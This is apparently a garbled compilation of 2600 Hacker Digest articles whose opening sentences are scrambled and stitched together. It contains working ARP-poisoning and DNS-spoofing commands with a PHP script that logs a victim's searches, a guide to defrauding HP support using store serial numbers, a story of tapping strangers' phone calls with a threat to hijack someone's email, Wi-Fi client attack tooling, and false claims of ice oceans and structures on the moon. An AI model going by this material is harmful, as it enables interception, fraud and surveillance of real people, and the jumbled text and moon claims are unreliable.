This is a standard for loop that will be used to examine every element of the array contained in ‘x.’ 4.) or the HTML contained within the ‘span’ tag. and it looks like this: I note that the price is in a ‘span’ element. I remember my first thought being “that was way too easy.” Then I drove down to Best Buy. This takes the 23rd element stored in ‘x’ and opens up a popup box that allows
. Batteries not included.THE HACKER DIGEST . something like ‘12345’ probably.) for(n=0.n<x. This will generate a popup for each element in ‘x.length. length. When I hit enter.getElementsByTag ➥Name(“span”).

html. be adopted to accomplish a great number of things. Now that our spoofed A record is in place. fwrite($handle.125 www.99 ➥/search?hl=en&q=’ . From here. of course. I’m always amazed at the number of people who do not mind sharing confidential information over any random open network. dsniff can already pick out any plaintext passwords. In the index. like so:
192.” This is not at all the most elegant solution as. in the history. I’ll give you a simple example of setting up your machine for DNS spoofing. $query). Begin with three ready-to-use shells on your machine.txt”.com
You can. with the real google. be it their email credentials. search for the segment ‘<form action=’.com. In the first. and ettercap (for ARP poisoning.168. or proving a point by modifying a Google search result. ‘a’). fwrite($handle. $query .168. poison the router to redirect the victim’s traffic to your machine:
ettercap -T -q -M ARP /victimip/ //
dnsspoof -f myhosts "host victimip"
This will tell dnsspoof to replace the hosts in the file ‘myhosts’ whenever the machine ‘victimip’ makes a query. or even pre-fill the input box with a random phrase. their bank account. or across any public computer. and redirect the user to a static Google IP address so that the real query is displayed.187. fragrouter.
Now we are ready to begin the actual DNS spoof. DNS spoofing is most useful when you get creative.com homepage downloaded as index. performing these spoofs on any network other than your own can land you into a lot of trouble. header(‘Location: http://64. in the example of stealing passwords. On the machine running the web server. fclose($handle). this will be worth a few moments of entertainment. Nor is it any sort of complicated example.THE HACKER DIGEST . Now. As there are many articles that go in depth into how ARP spoofing works. The technique of DNS spoofing involves sending a machine a false DNS record. the dsniff package. use the asterisk to redirect all subdomains. The PHP file is very short:
<?php
// collect.php: record the search the victim typed into the cloned Google page
$query = isset($_GET["q"]) ? $_GET["q"] : "";
$fname = "searches.txt";
$handle = fopen($fname, 'a');   // append, so earlier searches are kept
fwrite($handle, $query);
fwrite($handle, "\n");
fclose($handle);
// then hand the query to the real Google at a fixed IP so the victim still sees results
header('Location: http://64.233.187.99/search?hl=en&q=' . urlencode($query));
?>
fragrouter -B1
This will retrieve the query from the HTTP GET request.233. The tools I will be using are the Apache Web Server. $fname = “searches. such as replace the logo. we can have some fun with it.VOLUME 26
SPOOFING DNS ON A LAN
by Felixalias
Inspired by “Fun With Network Friends’’ by Uriah C. Or. ?>
In the other terminal. with as simple a use as adding a fictitious article to Slashdot. however.125 192. ‘’).google. As with many other articles.com google. we could simply log the searches. $handle = fopen($fname. “\n”). or any other number of important passwords. begin spoofing the DNS:
. changing the weather to something ridiculous. and webmitm can help retrieve SSL-encrypted text. or at least awareness of the dangers of trusting networks that are not your own. Of course. a separate untitled page will be listed before the Google search results.
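A host-side detector for the spoof this article describes, added here as an example (not part of the original, which covers only the attacking side). The DNS response records are constructed; 10.0.0.1 stands in for the LAN's resolver, and the 192.168.1.125 and 64.233.187.99 addresses are the ones used in the article.

```python
"""Passive detector for the dnsspoof race on a LAN.

Constructed example, not part of the article.  dnsspoof answers the victim's
query before the real resolver does, so the victim sees two responses for one
transaction ID; on this LAN the forged answer also maps a public name to a
private address.  The records below are constructed: 10.0.0.1 stands in for
the LAN's resolver, 192.168.1.125 / 64.233.187.99 are the addresses from the
article, and 11.22.33.44 is a made-up public address.  A real deployment
would fill the records from a packet capture.
"""
import ipaddress
from collections import defaultdict
from typing import Dict, List, NamedTuple, Tuple


class DnsResponse(NamedTuple):
    ts: float     # capture time, seconds
    src: str      # IP the response came from
    txid: int     # DNS transaction ID
    qname: str    # name that was queried
    rdata: str    # A record in the answer


class Alert(NamedTuple):
    kind: str
    qname: str
    detail: str


INTERNAL_SUFFIXES = (".local", ".lan", ".home", ".internal")


def is_private_answer(qname: str, rdata: str) -> bool:
    """A public-looking name answered with an RFC 1918, loopback or link-local
    address is the signature of a hosts-file style redirect like the one above."""
    addr = ipaddress.ip_address(rdata)
    internal_name = qname.lower().endswith(INTERNAL_SUFFIXES)
    return (addr.is_private or addr.is_loopback or addr.is_link_local) and not internal_name


def detect(responses: List[DnsResponse], resolver: str) -> List[Alert]:
    alerts: List[Alert] = []
    by_key: Dict[Tuple[int, str], List[DnsResponse]] = defaultdict(list)
    for r in responses:
        by_key[(r.txid, r.qname.lower())].append(r)
        if r.src != resolver:  # answer from somewhere other than the configured resolver
            alerts.append(Alert("unexpected_source", r.qname,
                                f"answer from {r.src}, expected {resolver}"))

    # Signal 1: two answers for one (txid, qname) that disagree.  The forged
    # one wins the race, so the first-seen record is the one the victim used.
    for (txid, qname), rs in by_key.items():
        if len({r.rdata for r in rs}) > 1:
            rs = sorted(rs, key=lambda r: r.ts)
            gap_ms = (rs[-1].ts - rs[0].ts) * 1000
            alerts.append(Alert("race", qname,
                                f"txid {txid:#06x}: {rs[0].rdata} accepted, "
                                f"{rs[-1].rdata} arrived {gap_ms:.0f} ms later"))

    # Signal 2: a public name resolved to a private address.
    seen = set()
    for r in responses:
        key = (r.qname.lower(), r.rdata)
        if key not in seen and is_private_answer(r.qname, r.rdata):
            seen.add(key)
            alerts.append(Alert("private_answer", r.qname,
                                f"public name resolved to {r.rdata}"))
    return alerts


# Constructed capture: a spoofed www.google.com lookup, then two clean lookups.
SAMPLE = [
    DnsResponse(0.000, "10.0.0.1", 0x1A2B, "www.google.com", "192.168.1.125"),  # forged, arrives first
    DnsResponse(0.031, "10.0.0.1", 0x1A2B, "www.google.com", "64.233.187.99"),  # genuine, arrives late
    DnsResponse(0.100, "10.0.0.1", 0x3C4D, "example.test", "11.22.33.44"),      # clean
    DnsResponse(0.200, "10.0.0.1", 0x5E6F, "printer.lan", "192.168.1.40"),      # internal name, fine
]

if __name__ == "__main__":
    for a in detect(SAMPLE, "10.0.0.1"):
        print(f"[{a.kind}] {a.qname}: {a.detail}")
```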

Hacking: An Astronomer's Perspective
by Ethernium57

It began in Junior High. Not just the interest in computers and astronomy, but the realization that there were those of us who had a knack for reading between the lines and figuring things out. Things other people didn't want us figuring out. Throughout the world, throughout the ages, this has been recognized as an art form and known by many names. Hippies call it a groove. Athletes call it the zone. Gardeners call it a green thumb. The Chinese call it Kung Fu. We call it hacking.

It is the inborn nature of a hacker to ponder all possible reasons whenever presented with a directive. By ponder, I don't mean the casual, "hmm, wonder why…" I mean it in the consuming sense. Your mind processes it day and night until the highest probability reason rises way above all other possibilities and wakes you from dead sleep and you can't wait until morning to put the realization to some use.

Back in the late 90's I worked the graveyard shift alone in the accounting department of a large meat-processing plant. This allotted some quiet time to be curious about things. If, as a joke, I typed "prgm blackjack ended 08:30:27" on the terminal in the office down the hall, a plant manager himself will actually make a point to call your home while you're trying to sleep just to inquire about such things, but only after technicians spend several hours attempting to locate and remove the nonexistent game from the corporate mainframe. Fortunately, I was able to point out that the timestamp indicated that it obviously happened a couple hours after I got off work.

My curiosity was piqued when a memo was distributed regarding incoming calls. It simply stated that no calls were to be directed to any extension that employees are not familiar with, especially extensions above the 6000 range.. This is precisely the kind of thing a hacker tunes into. Like, what would happen... Why the heck would corporate care if employees transfer an incoming call to a wrong extension — especially a non-existent extension? Wouldn't the caller simply get nowhere and have to call back? Then, in dead sleep, it hit me. We dialed 8 for long-distance, and 9 for local calls. As it turns out, any extension above 6999 was a real problem for corporate. Why? Because dialing 7 from our desk gave us an outside line for international calls. Duh! If we dialed any 'extension' beginning with 7, 8, or 9 for an outside caller, we'd literally be conferencing that caller into an outside line where the caller would be free to complete the dialing sequence with their touchtone phone, to call anywhere in the world, free of charge. Well, that was something MacGyver would have been proud of. So, if an outside caller wanted to call someone in Nebraska at 402-253-0437 (my Grand Central number, by the way — feel free to call and leave a message!), they'd simply ask for extension 8140. As soon as we transfer them to that extension, they'd dial 2-253-0437 and would be connected courtesy of the company's switchboard! Still, I had to try the theory out by calling another company's switchboard at night to make sure it would work.

My guess is that most people would be interested in the part about the free phone calls. I'd been able to read between the lines to reach a higher level of enlightenment, but it hadn't (yet) come to me how I could take this a step farther. The key element of interest for me was that a call could be made across a conferenced line. At that time in our rural Missouri town, a phone connection remained open almost indefinitely until the calling party hung up. Calling someone from a payphone, then dangling the handset by a piece of tape just above the hook and hanging an 'out of order' sign over it easily took foes offline for the entire weekend. Days later, while laughing myself to tears by prank-calling two numbers at a time and then conferencing myself and them together, I stumbled on the final missing piece of knowledge needed for some potentially significant mayhem. Combine that little jewel of knowledge with the realization that touch-tones from a conferenced call can dial out on another conferenced line. Suddenly you could tap someone's outgoing calls remotely on almost any phone simply by calling the person.

Putting all of this knowledge together, I attempted my very first remote phone-tap. I dialed that kid's number and, in a poorly-disguised voice, apologized for dialing the wrong number. I then pretended to hang up by conferencing in another line so he would hear a dial tone. He bought it! He hung up and I didn't. Then I waited. After only two or three minutes, he picked up the handset to make a phone call of his own. As soon as I heard him pick up the handset, I conferenced in my second line for him to have a dial tone, and he and I both waited patiently for someone to answer the ringing on the other line.. dit-dit-dit-dit-dit-dit-ditdit. Sadly, it didn't work on my first guinea pig: he had a rotary dial phone! I dropped both lines and decided to try it on someone else. On a side note, in retrospect, tying up that kid's phone for a weekend from a phone booth was simply uncalled for and childish. He was flirting with my girl (now my ex-wife), and I'd like to make it up to him by letting him have her.

About that time I got a long-distance call from an ex-girlfriend. I let her leave a message and I called her back. Would this trick work when dialing long distance? One way to find out. We talked for a bit, and then she said she was going to call her sister. I knew her sister was a long distance call for both of us, so it was a great test. But only if she had a touch-tone phone. She did. I conferenced in my second line when she picked her phone up, and it worked! I listened as she dialed the number, it rang and her sister answered on the other line. Their conversation turned out to be lengthy and boring and I disconnected them both to spare myself the costly phone bill.

My most memorable two-line call didn't rely on letting someone think they were dialing a number in privacy. I looked in the phone book for two people with the same last name in hopes they would know each other so I could get a conversation started between them. I dialed the first number on one line, dialed the second number on the other line, and conferenced them together. I heard an elderly man answer on one line. After a few more rings, a younger man answered the second line. The conversation that ensued went something like this:

"Hello?" "Hello?" "Hello?" "Oh, hi Dad." "Hi Son." (uncomfortable pause) "What do you need dad?" "I'm fine, Son. You called me." "No, Dad, I didn't call you. You called me!" (uncomfortable pause) "Why did you call me Dad?" (uncomfortable pause) "Son, I didn't call you. I just answered the phone." "But Son, you called me." "Ok, Dad, but I really didn't call you." (uncomfortable pause) "You don't need anything Dad?" "No, I'm fine thank you. I didn't call you. You called me!" "Go lie down and take a nap, Dad. We'll talk about it later." "Son, you called me."

Yes, I was there, listening, and wearing the grin of a genius mastermind watching my evil plan come to fruition. Before I was done, they thought someone else had... Crap. In retrospect, as you can imagine, this is one call I shouldn't have made. I hope I don't go to hell for it.

As I matured beyond such things (or maybe it was just the growing population of people with caller ID), I became interested in finding loopholes in other things. I've figured out ways to hack bulletin board systems, voice mail systems, email systems, cell phones, Internet cafes, websites, security systems, fortune 500 systems.. federal systems.. and on and on with little if any assistance or training from other hackers. Always for fun, and almost always without hurting anyone. It's just my nature. Yours too. It's basically due to three questions that continuously run through my head about everything I encounter: why does it exist, what possible reasons would they have for not wanting me to do that, and how do I take it a step further?

My interest in astronomy was merely a curiosity, but eventually my girlfriend took notice and bought me a pretty nifty Meade telescope. It was daylight, so I actually bothered to read the instructions that came with it while waiting patiently for the sun to get a move on. The instructions were pretty straightforward. After all, obviously, it's a telescope. You just need to point it at things. Finally, though, something reminiscent of that phone extension memo caught my attention. Something between the lines just wouldn't let go of me, and I had to explore the possibilities.

The instructions gave a brief description and use for each lens included with the telescope. Regarding the highest-power lens, I read it was for deep-space only.. The 'only' could have caught my attention, but for all I knew it was written in a foreign country and it's common for extra words to get thrown in that way.. The suggestion didn't end there, though. It then went so far as to say that looking at nearby objects such as the moon with a high-power lens would be boring. That seemed a reasonable statement, at least... Isn't that sort of like suggesting how boring it would be to turn your cell phone on at 39,000 feet? The feeling wouldn't let go. Oh boy — the three questions hitting me all at once. Why would anyone discourage someone from looking at the moon with a high-power telescope lens? It bothered me to the point that... what was it? Surely that telescope instruction wasn't just to keep me from aiming the high-power lens across town at the girls' dorm windows. So... Contrary to the documentation, of course, the first thing I did with my telescope is pop in the so-called deep-space lens and stare at the moon.

When viewing the moon with the naked eye, the earth's rotation is hardly noticeable from one second to the next. When viewing the moon up close with this lens, it becomes a continuous battle to keep the moon within the scope. And that's after you finally get it into focus! But, when in focus and keeping a rhythm with the scope's movement on its tripod and the earth's rotation, I found looking into the craters on the moon pretty exciting! It instantly became my favorite lens. Utilizing such a tool to observe the moon requires extraordinary patience, of course. Nope, it wouldn't let go. I wondered even more so why a telescope company would dissuade people from taking a close look at the moon. If it bothered them for me to use a high-powered lens to look at the moon, I had to know why. In the meantime, I decided to take it a step further. I took every lens I had, even using some extras I found at a garage sale, combined with a doubler and even a tripler lens and, using duct tape and glue, formed a tube of lenses approximately two feet long.

When you look at the moon with the naked eye, you see some bluish colors. I've been told the dark areas are shadows.. I've read that the dark areas are due to different types of soil deposited by meteors. Where does the blue color go when viewing the moon through a standard telescope? When you look at it with a regular telescope, the blue vanishes into a monotone gray. With multiple lenses combined, I was able to focus the colors back in and found that the moon has at least three distinct colors. The darker areas I saw with the naked eye were once again an ocean-blue color when viewed with the "super lens". To me it looked like water. The edges of most of the craters (outside of the ocean-blue areas) were bright lava-orange, and the rest were sort of a beige-rust color. The ocean-blue areas have craters, but they were clearly seen to be set in oceans of solid ice... with the exception of numerous lava-orange ridges that ran across the surface. Also, after exhausting all efforts to find anything out of the ordinary with the high-powered lens, I observed formations that didn't look like something that would occur naturally. They appeared to be piles of rectangular beams. The piles were in small groups, with maybe fifteen beams in each pile. I observed only a few groups of these formations. Just as it is in hacking technology, you suddenly realize the science teacher back in high school didn't quite teach you everything. Or maybe you skipped class that day.

Not even fully recovered from the surprise of seeing colors and shapes on the moon, the first thing I wanted to do is take a look at the NASA website. They've been there — surely they'll have photos of some of the things I've just seen... I browsed through thousands of NASA moon photos and saw nothing even close to what I'd just seen through my telescope. Not only did NASA's photos not reveal any of the odd structures, they also showed no trace of color (other than gray)... What's the deal?! I spent the next few weeks researching the moon landing... and watching the discovery channel for answers. But what did I know? After all, the question kept running through my mind: Am I the only one, the only civilian, to have seen what the surface of the moon really looks like up close?! I wake sometimes, staring through dark air with the hairs on the back of my neck on end... that tingling feeling between my ears... I almost had it... it... must... stop... And I'll know. One of these days you'll see one of the endless possibilities will rise majestically to the top.

I've just Googled that guy still living in that same small town in Missouri. Facebook and MySpace are wonderful things. And she doesn't know it yet... but all of his incoming email is about to get forwarded to the girl he listed as his girlfriend.

Transmissions
by Dragorn

I’m going to risk making a potentially bold statement: Servers and networks are getting boring. Yet another brute force SSH worm? Yawn. The latest PHPBB exploit isn’t interesting. Demonstrating WEP breaking on yet another network is boring. By now, we know these things are weak, and we’re just making ourselves hoarse cautioning everyone about them again and again. We (myself fully included) have been parroting the same dry warnings to customers, media, and fellow hackers for years.

What attack surface happily extends itself beyond the corporate firewalls onto untrusted networks? What wanders around the town, city, country, or even world advertising where it came from and what it would like to talk to? All the corporate firewalls in the world won’t do a lick of good when the client is connecting to “Free Public Wi-Fi” at an airport in San Jose, or Chicago, or New York, or Copenhagen. Connecting to a user away from home is as trivial as it gets.

When the Wi-Fi is enabled, most systems look for preferred networks (or just any network they’ve ever connected to before). Many versions of Windows will even create an ad-hoc network of the same name if they can’t find the one they want to join, advertising it whenever they go somewhere where there are no other preferred networks, leading to viral wireless networks which spread worldwide. “Free Public Wi-Fi” and “HP Setup” are some of the most notable. Somewhere, sometime in the past, there was a real network called “Free Public Wi-Fi”.. but now it’s a replicating ad-hoc network. Joe Random User thinks, “I like free. I like Wi-Fi. Why not,” and is now another system with the “Free Public Wi-Fi” ad-hoc network in their preferred list. And yes, of course, not every wireless management program defaults to making an ad-hoc network. Too bad the ad-hoc network doesn’t go anywhere, since no one is providing DHCP service. Oh wait..

It gets worse: Configuring an ad-hoc network for every client looking for a network is boring. Karma, patches to the Madwifi drivers, or the userspace airbase-ng from the Aircrack suite, automate replying to every query. Are you “Free Public Wi-Fi”? Yes, come on in. Are you “My Corpnet”? That too. Are you the random garbage Windows Zero Config spews? Sure, here’s an IP. What’s the first action taken by clients after getting an IP? Checking for updates and connecting to... yes, I am your POP3 server, who are you and would you like to tell me your password? Besides, controlling layer2 means controlling everything the client sees.

The insidious part of these attacks is that the user never knows it’s happening. As far as the client is concerned, the network is operating as expected. There is no reason for the OS to present the user with an alert, or the user to suspect anything is amiss. If a user is particularly alert, they may notice the “Joined Network” pop-up from the network manager, which implies their systems are completely up to date and the tools present the users with proper information.

Why is it so easy to attack clients directly? Client security is almost entirely in the hands of the users. Users are notoriously bad at making good decisions about security. So bad, it’s necessary to assume that in any situation where the user is asked a question, they will choose the worst, most destructive answer. This, of course, assumes the user is even given the opportunity to make the right decision.

It gets even worse: Spoofing all these services for every client you’ve attached is tedious, right? Isn’t there a simpler way? Yup! Karmetasploit, a combination of Karma/Airbase and Metasploit, uses a spoofed DNS server to alias all remote hosts to itself and brings up a web server serving browser exploits directly to the client. The Evilgrade toolkit performs similarly for trapping unprotected or unauthenticated automatic upgrades from assorted software packages.

It continues to get worse: Why bring up a fake network when an open network is just as good? Despite being several years old, Airpwn is still relevant. Developed to inject goatse into browsers at Defcon, it demonstrates the ability to inject content into an otherwise trusted browsing session. An attacker can inject images to exploit known browser vulnerabilities, or rewrite included javascript files to alter the page within the browser. The web browser security model expects that code loaded by a page is allowed access to the page (cookies, DOM, etc.). Overwriting (or appending to) a trusted javascript file allows execution within the same trust region as the website. Many popular sites support SSL for login, but then serve the normal site over standard HTTP. Even if the rest of the site is encrypted, any time content is loaded unencrypted (such as ad content for images), it can be substituted with hostile content, exposing session cookies and content.

When IP allocation, DNS queries, http queries, and all other network access is controlled by the attacker, a user doesn’t stand much of a chance. Why spend the time focusing on clients? The simplest case gets credentials to the protected network, by spoofing network services and capturing logins or by sniffing unprotected plaintext. The insidious attack path, most likely, is to install sleeper software. Firewalls are usually designed to keep traffic out, not prevent traffic from leaving. Even undisguised channels can often go undetected, never mind stealth channels using encryption or timing.

So after all the doom and gloom, what can actually be done to fix the problem? The simplest method for protecting clients is to turn off the radio when not in use, maintain patch levels at all times, and force the use of VPN for any sensitive content. But let’s be real: That’s not likely to happen in most situations. Until the operating system and user tools become simple enough to allow novice users to defend themselves, client security is in a bad place. Protecting clients outside of the sheltered world of the firewalled intranet will continue to be a major challenge and vulnerability for some time to come.

OFF THE HOOK
Wednesdays, 1900-2000 ET, WBAI 99.5 FM, New York City
and at http://www.2600.com/offthehook over the net
BROADCAST FOR ALL THE WORLD TO HEAR
Call us during the show at +1 212 209 2900. Email oth@2600.com with your comments.

Social Engineering HP for Fun and Profit
by haxadecimal

We all know how bad HP support is. Luckily, the money saving system of IT and customer service outsourcing has its weaknesses that can be exploited. First let me address the usual protocol when you call HP for technical support. The end user dials the toll-free number and is dumped into an automated system where they choose what kind of support they need and what type of product they are calling about. The caller is then connected to a live call router, which is going to either be India, South America, Canada or the USA. The call router will ask you for your basic information, the serial number of the product you are calling about, and a brief description of the issue you are having. They are also required by company policy to offer to sell you something (usually an extended warranty) and give you a case number before sending you off into the actual technical support queue. At this point you are routed to the next level of support. Calling for help is taking a gamble on who you will be connected to and, more importantly, where you will be connected. This person is the bottom of the barrel, as far as support reps go, and is generally in India. The tech support rep will ask you for your case ID number, verify your information, and then proceed to troubleshoot or assist you with your issue.

The main weakness of this system is that they will log virtually anything you tell them into HP’s support software. Say you purchase a used computer and need help with it. You call them and provide them the serial number and, even though the original owner’s information will pop up, they will still add you as the current user/owner so that you can receive support. This means that you can go down to your local mega-mart and jot down some serial numbers and start having some fun.

Another weakness is in getting replacement parts. HP sends out two types of replacement parts, exchangeable and non-ex­changeable. If your battery is bad, they will send you a new one with a return label to send back the old one. If you do not return it, they will charge your credit card for the replacement. But a non-exchangeable part, like an AC adapter, will be sent free of charge, without taking a credit card number and without the need to return the old part. Other non-exchangeable parts are headphones, TV tuners, and pretty much anything that comes in the box with the system, other than the battery. The best part about this is that you can request tons of this stuff and they will never bill you. And, since you are giving an alias with serial numbers you took down from store display units, it will never look suspicious in the system.

Yet another weakness they have comes from the use of outsourced case managers. These are the top of the food chain as far as support goes. Once again, these are all outsourced companies and not HP. Their only job is to make you, the end user, happy, and are authorized to provide you with free upgrades, free software, replacement computers, and extended warranties. If you request to speak with a case manager, the agent is required by company policy to honor your request. If they take this course of action, they will either immediately transfer you or schedule a call back. It is not unusual for a case manager to simply send out a replacement unit to keep a caller happy. I personally was on a call where a man was sent a new computer because he could not remember his AOL password and blamed HP for it. They send you a FedEx label to return the “defective” product; it should not be a problem. Use your imagination and you can exploit them. Have fun.

The Last 1000 Feet
by b1tl0ck

It was April 2003. We were breaking ground on what would become the greatest struggle for high speed Internet that I have ever experienced. While building the house was challenging enough, finding an ISP that offered high speed Internet in my area was my greatest challenge. Before we even broke ground, I called Time Warner Cable to make sure that Road Runner was available in the area we were building. I was informed “Yes.” I followed this call up with a visit to the TWC website, and it was confirmed that I could indeed get Road Runner based on the phone number of a house in the area we were building. This gave me a feeling of relief. When the house was about finished and our phone number was assigned, I decided to call TWC once again to find out when I could get Road Runner installed.

During this call, I was informed that Road Runner was not available for my house. In a state of disbelief, I asked the person to check again. After reconfirming that it was not available, they offered to perform a site survey to determine why exactly they could not provide Road Runner to my residence. A feeling of sorrow came over me. The results of the site survey concluded that they would need to extend service 8850 feet to provide service to my house. The letter indicated that TWC would cover $1800 of the project, and that I would need to cover the remaining $38,946. There was a contact person and phone number listed on the letter. I decided to call this person to find out if I was expected to pay that amount for service. The person said that the company writes letters like that on occasion and that nobody had taken them up on the offer to date. I enjoy broadband as much as the next person, but I was not about to pay that kind of money for it. I thanked her for her time and politely declined their services.

After calling all the major broadband providers that I could find, I realized that it was going to be a losing battle. I decided to look for a more ‘grass roots’ type of establishment. The first local ISP I called had been around for a long time in the town where I live, and they had just started providing a wireless broadband service. My ears perked up a bit when I was talking to the tech guy about it, but there was a catch. My house had to be within line of sight of the water tower located about 5 miles away. I scurried up to my rooftop to see what I could see. I couldn’t see the water tower from my house… Then, I had a ‘eureka’ moment. My in-laws live just a stone’s throw away from my house (well, actually, it’s about a quarter mile), and they’re on a hill. I raced up their driveway and, what do you know, I could see the water tower from their front yard. Being in the IT industry, I know enough about wireless communications to ‘shoot’ the signal from the in-laws’ house over to my house. I thought to myself “I can make this work.” Even if I didn’t, that’s what Google and smart friends are for. I called the ISP and signed up the in-laws’ house. They came out and installed their antenna and radio. Their house was now hooked up, and I needed the equipment to make it happen. The hunt was on.

Having dabbled a bit in wireless ‘cantenna’ building, I had a few ideas for where I could find the goods I needed. A few websites and phone calls later, I had my antennas on order. I had purchased an omnidirectional antenna for my house and a directional, yagi style, antenna for the in-laws’ house. I won’t go into the technical specs of each antenna, but I’ll say they are commercial grade. I also purchased two Linksys WAP11 Access Points and a standard four port Linksys router from a large electronics store. I measured it out, and it was about 1000 feet (line of sight) from the corner of their porch to the back corner of my house. When I showed my father-in-law the antenna that I wanted to mount on the front of his house, he was a bit skeptical. Not only because he thought I was nuts for going to all this trouble for Internet, but also because the antenna was white, and his house was brown. I told him I’d simply paint the antenna to match his house, and he was on board.

Finally, the day came, and my antennas arrived. At the in-laws’ house, the directional antenna was mounted on the corner of the porch and a cable was run up through the soffit, through a closet in the bedroom, and connected to the left antenna jack of the WAP11. I cut a hole into the wall behind a shelf in the closet in order to climb out into the soffit area to pull the cable through. I then drilled two more holes and mounted the cables nicely into the wall. DHCP was being served from the in-laws’ house via a relatively inexpensive router. In the basement of my house, I set up the other WAP11 in bridging mode, with the cable of the omnidirectional antenna plugged into the left antenna. I mounted the omnidirectional antenna on top of our TV antenna and purchased 50 feet of heavily shielded cable with TNC connectors. The RJ45 jack on the back of the WAP11 in my basement fed into the ‘source’ port on my main switch, which fed all of the network jacks in my house.

Another item to mention is that between our houses is a fairly thick tree line. For the first couple of years, each Mother’s Day the Internet connection would go flaky, like clockwork. Turned out that when all the leaves grew back on the trees, it was enough cover to hinder the signal strength. After investing in a tree saw, we’ve made sure there is a large enough hole in the tree line that we won’t have to worry about the degraded signal for a few more years. After three years of reliable service, around May 2006, the wireless connection between the two houses became flaky and unreliable. After troubleshooting, I narrowed the issue down to bad hardware on one of the WAP11 devices. I went back to the large electronics store only to find that WAP11s had been replaced by WAP54G devices. (While in bridging mode, the WAP11 would only communicate with a few other Linksys devices. WAP54G was not one of them.) I purchased two WAP54G devices for around $79 each, went home, configured the devices, and within 20 minutes was back up and running. Since May 2006, there have been sporadic hardware issues with the Linksys devices I used. I’ve replaced each access point in my system twice since 2003. Yes, I know I could invest in some higher-grade equipment, but where’s the sport in that? Don’t get me wrong, but if it isn’t broke... One nice thing about the ISP being local is that they don’t mind me doing what I’m doing, in fact they donated a couple of antennas to my cause the last time they came out to see me. Whenever I call the ISP (usually after a big storm, when their antennas on the water tower are acting up), I get the usual greeting of “Oh, Hi <insert my name here>. You’re the one with the wireless between the houses”.

Some of the things I’ve been kicking around for future improvements are:
1. Bury a cable between the houses and sever the wireless communications. This route would be difficult because the distance between the houses is greater than the maximum distance recommended for CAT5e. This would need some sort of repeater/signal amplifier in between, which would require power.
2. Swapping out the antennas for newer equipment.
3. Experiment with better hardware & software firewalls to replace the Internet-facing router in place today.

I’m getting 1.5Mbps down and 384kbps up with the service I subscribe to. Not the fastest connection in town, but it was a learning experience for me as well as a fun project. Thank you for reading and I hope that this story inspires you to keep going when someone or some company tells you that what you want to do isn’t available or possible.

promising. And either a brand new approach is tried or we fall right back into the same old habits. running up credit card charges. CALEA. It basically puts control in the hands of the users and prevents broadband carriers from discriminating against certain competing applications or content. stealing and destroying information. In this administration we saw more clampdowns and imprisonments of individuals for nebulous computer-related crimes than ever before. But we’re not so naive as to think that there won’t be contradictions and exceptions invoked that will anger us down the road. Net neutrality is strongly opposed by the communications giants even though it’s how the Internet has worked from the start.” So far. we at least have the potential of getting it right. This threat was overshadowed by the attack and wanton disregard of everyone’s civil liberties in the name of national security. 2001. Obama’s position on this remains unchanged as of his May 29th remarks: “I remain firmly committed to net neutrality so we can keep the Internet as it should be . really the first administration with any sense of computers and connectivity. Which is why our vigilance on these matters is especially important. Rather than foster transparency.
As expected. Clinton pushed for more control and surveillance under the name of such horrors as the Clipper Chip.VOLUME 26
The Not Enemy
Any time there’s a new administration in power. Remarks made by Bill Clinton in 1999 on the subject of “Keeping America Secure for the 21st Century” included this gem: “Last spring. and the Communications Decency Act. by extension. Hardly an enlightened approach. we saw the enormous impact of a single failed electronic link. and television networks all around the world. The recently released Obama initiative on “cybersecurity” could really go either way at this point. credit card systems. And sometimes both of these happen. In the Clinton years. the seed was planted in many that hackers were the enemy. We saw the usual exaggerated statistics to make the public scared of the hacker threat. Again. There will be tremendous pressure to stray from this path and it’s up to
full disclosure. Education gave way to crackdowns and prosecution. open and free. hackers break into government and business computers. he seems to appreciate certain aspects of it that those in power frequently don’t get. The concept of network neutrality is one shining example of this. If promises of dialogue and open-mindedness are held to. Let’s look at policies of the past. a lot of potential was lost because common sense was sacrificed to shrill headlines and a sense of panic. not much changed in the Bush years. extorting money by threats to unleash computer viruses. ATMs. leading many to conclude that true change is nearly impossible to achieve. So now we have a president who likely understands the Internet better than any of his predecessors. It’s next to impossible to have this much power and hold onto these lofty ideals. In the period following September 11. Hackers were still seen as a threat but now there were so many perceived threats that it wasn’t too difficult to prove how ill-conceived the policies were. so good.” By portraying hackers as sociopaths and by linking them even indirectly to massive technological failures. disabled pagers. More importantly. This is also an administration that supports. at least on paper. the idea of open source software and. we’re likely to see a renewed effort to address certain problems. And we already are seeing the first wave of deliberate cyber attacks . when a satellite malfunctioned . there were serious fears that the newly formed Department of Homeland Security would treat hackers as if they were equivalent to terrorists. But there are still enough troubling signs overall for us to be seriously worried.

We see how society has changed so that these interests (computer access and free communications) are now encouraged. our ideals have a chance of surviving and many of our nation’s brightest could help steer us in the right direction. Already. We’re quite pleased to see no mention at all of hackers in the main report. Not so long ago. increasingly. but Obama’s spoken remarks weren’t as tempered.
the media has created the perception that anyone causing any sort of mischief on the net or involving a computer is ipso facto a hacker. But they’re clearly not and a mere look at the constant dialogue that runs through our pages will show any outsider just how seriously true hackers take this sort of thing. We will preserve and protect the personal privacy and civil liberties that we cherish as Americans. profiteers. whether it be on an insecure website. Often they enjoyed and understood the systems they were using far more than the legitimate users and they frequently went on to design better ones. Referring to his own experiences during the campaign. But a “lone hacker?” This is now by default a bad thing? We prefer to think of a lone hacker a thousand miles away as a beam of light and quite possibly the person who can help to find solutions to the very same issues being discussed here. they are only words. it was impossible for most curious people to play with a UNIX machine without breaking into one. organized crime. Communications once were so prohibitively expensive that manipulating one’s way around the Bell System was almost a necessity for those who simply wanted to stay in touch and share information. foreign intelligence services. to name but a few. Does this make them hackers? We also see almost daily instances of nonexistent security where thousands or even millions of personal records are left wide open for anyone to stumble upon. What disturbs us in Obama’s cybersecurity plan is the continuing jingoistic approach to the perceived hacker threat. from policy position papers to travel plans. “Between August and October. let alone that they were hackers. vandals. the Obama administration has opted to protect the NSA’s warrantless wiretapping program in the name of national security. Hackers will figure things out. will not include . or attempt to cause mayhem through viruses and worms. They will tell other people.
the lone hacker a thousand miles away. They are the epitome of the open environment that Obama claims to support. the disgruntled employee on the inside. But what we should expect is for distinctions to be drawn between this sort of thing and the antics of idiots. particularly one that was obviously so high profile. the industrial spy and. ironically. They are not the miscreants who profit from corporate espionage. hackers gained access to emails and a range of campaign files. This is a surefire way to not only lose the battle but to lose a generation of innovators and freethinkers. By simply awarding any evildoer with a keyboard this title. “Our pursuit of cyber security will not . the threat is deemed to be the “hackers” even when no evidence exists that anyone at all even accessed the information.
